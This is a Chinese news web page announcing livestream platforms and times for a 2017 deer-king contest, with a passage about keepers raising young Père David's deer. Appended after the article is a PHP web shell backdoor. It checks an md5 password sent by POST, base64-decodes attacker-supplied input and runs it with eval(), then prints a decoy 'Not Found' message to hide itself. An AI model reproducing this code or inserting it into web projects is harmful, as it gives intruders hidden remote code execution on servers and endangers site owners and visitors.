最新要闻

首页 > 最新要闻 >

    鹿王争霸直播大剧透

            2017鹿王争霸直播活动媒体平台包括央电视台新闻频道、东方卫视看东方、香港卫视、东方卫视看看新闻网、盐城广播电视总台融媒体、爱奇艺、优酷、斗鱼直播、今日头条、北京时间、触电直播、凤凰江苏、虎牙直播、荔枝台、奇秀直播等15家媒体共同直播!
           6月18日上午9点至10点,大家可以在以上平台观看直播,共同见证王者的诞生!

         
            小麋鹿驯养已经颇有成效,这些小可爱们都非常亲近人。现在小鹿体重都在50多斤,2个月龄了,驯养员和麋鹿都建立了很深的感情,像自己的孩子一样呵护着,相处2个多月来,没有一个驯养员因为请假离岗,都一周七天坚守岗位,因为他们知道,小鹿一顿不吃就会饿着。驯养要抚摸,跟他玩,要有爱心、责任心、细心,有时候大家也会因为麋鹿精神状态不好而着急,但当他们看到小麋鹿一天天长大,活泼可爱的像个孩子一样要娇惯的时候,什么苦都忘了。

            小麋鹿此次也会在直播时亮相,上午9:45-10:15,下午3:00-3:30。大家一起来与小麋鹿互动吧!带着自家萌宝跟小麋鹿比比谁最萌吧!
     

     
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>